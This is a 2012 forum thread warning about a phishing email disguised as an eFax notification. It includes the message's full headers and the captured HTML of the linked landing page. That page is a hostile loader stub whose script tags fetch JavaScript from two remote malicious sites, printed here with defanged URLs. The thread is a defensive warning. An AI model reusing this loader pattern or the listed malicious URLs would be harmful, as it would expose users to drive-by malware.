dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
727
share rss forum feed


DrStrange
Technically feasible
Premium
join:2001-07-23
West Hartford, CT
kudos:1

New Social Engineering Attack - Fake e-fax

Submitted for your perusal...

Got this forwarded from a customer this morning:

Return-path:
Envelope-to: customer@customers-domain.com
Delivery-date: Wed, 15 Aug 2012 09:41:45 -0500
Received: from exprod6mx202.postini.com ([64.18.1.102]:41217 helo=psmtp.com)
by customers-mailserver.com with smtp (Exim 4.77)
(envelope-from )
id 1T1en3-0002AH-LU
for customer@customers-domain.com; Wed, 15 Aug 2012 09:41:45 -0500
Received: from 186.214.162.105.static.host.gvt.net.br ([186.214.162.105]) by exprod6mx202.postini.com ([64.18.5.11]) with SMTP;
Wed, 15 Aug 2012 10:41:48 EDT
Received: from apache by pbhphpcqxchjeryyiraac. with local (Exim 4.63)
(envelope-from )
id 1FAPY2-D4VTNR-JT
for customer@customers-domain.com; Wed, 15 Aug 2012 11:41:47 -0300
To: customer@customers-domain.com
Subject: Corporate eFax message - 2 pages
Date: Wed, 15 Aug 2012 11:41:47 -0300
From: "eFax"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------04040100701010501050904"
X-pstn-levels: (S:11.98852/99.90000 CV:99.9000 FC:95.5390 LC:95.5390 R:95.9108 P:95.9108 M:95.5423 C:98.6951 )
X-pstn-dkim: 0 skipped:not-enabled
X-pstn-settings: 5 (2.0000:2.0000) s cv gt3 gt2 gt1 r p m c
X-pstn-addresses: from [81/4]

There was an html attachment that looked like an e-fax notification, except the links pointed to:

hxxp://szelo.nstrefa.pl/7b2VMt6D/index.html

That site tries to load Javascript from two other websites:

--- 08/15/12 15:23:34 Eastern Daylight Time
--- reading URL hxxp://szelo.nstrefa.pl/7b2VMt6D/index.html
--- contacting host szelo.nstrefa.pl [91.203.134.164] on port 80

HTTP/1.1 200 OK
Date: Wed, 15 Aug 2012 19:23:37 GMT
Server: Apache
Last-Modified: Wed, 15 Aug 2012 19:01:27 GMT
Accept-Ranges: bytes
Content-Length: 237
Connection: close
Content-Type: text/html

[html]
WAIT PLEASE
Loading...
[script type="text/javascript" src="hxxp://modelsforfitness.com/WqrMdzkZ/js.js"][/script]
[script type="text/javascript" src="hxxp://nbecomputer.com/eSCz047F/js.js"][/script]

[/html]
--- connection closed



cbrigante2
Cubs 20??
Premium
join:2002-11-22
North Aurora, IL
Yep, a few of these came through on my mail server this morning.